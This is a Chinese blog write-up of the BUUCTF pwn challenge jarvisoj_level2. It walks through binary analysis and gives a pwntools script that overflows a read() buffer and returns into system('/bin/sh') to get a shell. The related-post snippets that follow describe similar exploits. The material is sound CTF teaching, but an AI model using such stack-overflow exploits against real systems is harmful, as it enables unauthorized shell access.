[BUUCTF] jarvisoj_level2

最新推荐文章于 2024-07-25 21:40:10 发布
最新推荐文章于 2024-07-25 21:40:10 发布
阅读量409 收藏 4
点赞数 4
分类专栏: pwn学习 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lucien_Carr/article/details/137756457
版权

0. 环境

Ubantu-22.04.4

1. 查看文件格式

终端中输入命令

checksec --file='filename'        # filename为下载文件的自定义名称

结果为

只开了NX保护

终端中输入命令

file 'filename'

输出为

 32位程序,放到IDA中继续分析

2. IDA分析程序

1. main函数

发现函数vulnerable_function(),这算明示了吧

2. vulnerable_function函数

有危险函数read,而且调用了system函数(但是缺少了“/bin/sh”参数)

关于read函数:

read函数可以读取文件。读取文件指从某一个已打开地文件中,读取一定数量的字符,然后将这些读取的字符放入某一个预存的缓冲区内,供以后使用。

read(handle, buffer ,n);

其中:

handle: 一个已经打开的文件句柄,表示从这个文件句柄所代表的文件读取数据。

buffer: 指缓冲区,即读取的数据会被放到这个缓冲区中去。

n: 表示调用一次read操作,应该读多少数量的字符。

进入文本视图查看system函数地址,如下图

 system函数地址为0x0804845C

3. 查看字符串

按“shift”+“F12”查看字符串,结果如下

双击查看其所在地址

 “/bin/sh”参数地址为0x0804A024

3. 构造exp

直接上脚本

# coding: utf-8    #python2.7中文注释
from pwn import *

r = remote("网址",端口号)

offset = 0x88 + 4    # 缓存区大小为88h
binsh_addr = 0x0804A024
system_addr = 0x0804845C
payload = offset * b'a' + p32(system_addr) + p32(binsh_addr)

r.sendline(payload)
r.interactive()

攻击成功,结果如下

 

Lucien_Carr
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF jarvisoj_level2
leesinalps的博客
12-01 112
可以看出利用的是格式化字符串的漏洞,需要我们修改var地址往下数第十四个,类似是数组的结构到var[13]为17,并且为LL就是long long int八个字节,,相当于64位的数据'\x11\x00\x00\x00\x00\x00\x00\x00'。如果用户输入的数据超出了数组的大小,就会覆盖内存中的其他数据,这可能导致不可预测的错误或者潜在的攻击。总之,这段代码的主要问题在于它没有进行充分的输入验证和保护,因此容易受到输入数据的恶意滥用,可能会导致安全漏洞。:这一行定义了一个名为。
BUUCTF jarvisoj_level2 题解
qq_51802916的博客
08-20 321
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
BUUCTF jarvisoj_level2_x64
小白垃圾笔记2
05-12 284
因为有栈对齐所以需要ret,因为是64位传参所以需要pop rdi。system函数的地址也可以看。小白做题笔记,不建议阅读。我们尝试找下bin/sh。函数直接调用漏洞函数。
buuctf jarvisoj_level2
carol2358的博客
04-19 284
水题 可以在ida里找到system和/bin/sh(alt+t) 然后构造payload就完事了 from pwn import * from LibcSearcher import * context(log_level = 'debug',arch ='i386',os = 'linux' ) r = remote('node3.buuoj.cn', 28847) #r = proc...
[buuctf]jarvisoj_level2
逆向萌新的博客
06-19 485
[buuctf]jarvisoj_level2
jarvisoj_level2_x64[BUUCTF]
moonlightsunshin的博客
05-04 289
32位中参数都是保存在栈上,但在64位中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。read函数存在溢出同时发现有/bin/sh所以我们思路就是构造溢出到/bin/sh,但是由于是64位的程序在函数调用时与32位不同。由32位变成了64位。payload的组成 无用数据+pop rdi+函数参数+函数调用地址/bin/sh+函数返回地址system。回到这道题 64位会依次传函数返回地址,函数参数,函数调用地址,
buuctfjarvisoj_level2
weixin_54452942的博客
04-11 533
buuctf--pwn
buuctfjarvisoj_level0
weixin_54452942的博客
03-28 1015
64位(system_addr+1)的奥秘
jarvisoj_level2【BUUCTF
qq_41696518的博客
08-26 676
jarvisoj_level2【BUUCTF
jarvisoj_level2_x64
zip471642048的博客
06-24 562
题目地址 : https://buuoj.cn/challenges#jarvisoj_level2_x64 /bin/sh字符串 exp
CALIPSO_READERS_L2_Level2_5km_calipso_
10-02
标题“CALIPSO_READERS_L2_Level2_5km_calipso_”指的是NASA的CALIPSO(Cloud-Aerosol Lidar and Infrared Pathfinder Satellite Observation)卫星数据的第二级(Level 2)5公里分辨率的读取器。描述中提到的“nasa...
Level_Set.zip_level set_level-set_set
07-15
这个"Level Set.zip_level set_level-set_set"压缩包文件包含了一个名为"Level_Set.m"的MATLAB程序,用于执行Level Set算法。 Level Set方法的核心思想是将图像中的边界或形状表示为一个零水平集(level set)函数...
level_set_image.rar_level set_level set 方程
09-21
这个"level_set_image.rar_level set_level set 方程"的压缩包内容可能包含了一个名为"level_set_image.m"的MATLAB程序,用于演示或实现Level Set方法在图像处理中的应用。 Level Set方法的核心在于用一个标量函数...
five_level_inverter.rar_CMLI_5level_harmonics inverter
07-15
2. “conbined_five_level.asv”:可能是一个综合了五电平逆变器不同特性的模型或者仿真结果。 3. “switching_angles_5_level_hardware.asv”:可能涉及到逆变器硬件实现的开关角度控制策略。 4. “newton_raphson_...
LRVOSUN.rar_level set_level set model
07-14
A new level set model without initialization, very time effi
企业如何保证公司内网安全
shunyou0526的博客
07-25 168
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
极速下载!青苹果系统Win7旗舰版:稳定安全
lihuiyun184291的博客
07-25 181
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
2024安全大模型技术与市场研究报告
cybtec的博客
07-25 272
2024安全大模型技术与市场研究报告
一线工作中常用 Shell 脚本: Jar包部署为linux系统服务; 恶意访问,安全防范; SSH 免交互执行命令;
最新发布
iOS逆向与安全
07-25 43
当要使用多个不同的private key登录不同的主机时,我们可以在ssh命令里面用-i参数指定每次使用的private key文件。需求: 通过脚本自动化部署(自动远程登录、远程复制本地资源到服务器,远程执行部署相关命令。之间,remotessh可以随便修改成其他形式的字符串。可以利用~/.ssh/config文件,在让ssh自动为我们决定应该使用哪个key。在文本中搜索指定的内容——grep命令的常用选项。远程执行的命令内容较多,使用脚本方式实现。方法2:通过TCP建立的连接。
jarvisoj_level2
08-13
- *1* *3* [jarvisoj_level2_x64](https://blog.csdn.net/zip471642048/article/details/125448386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值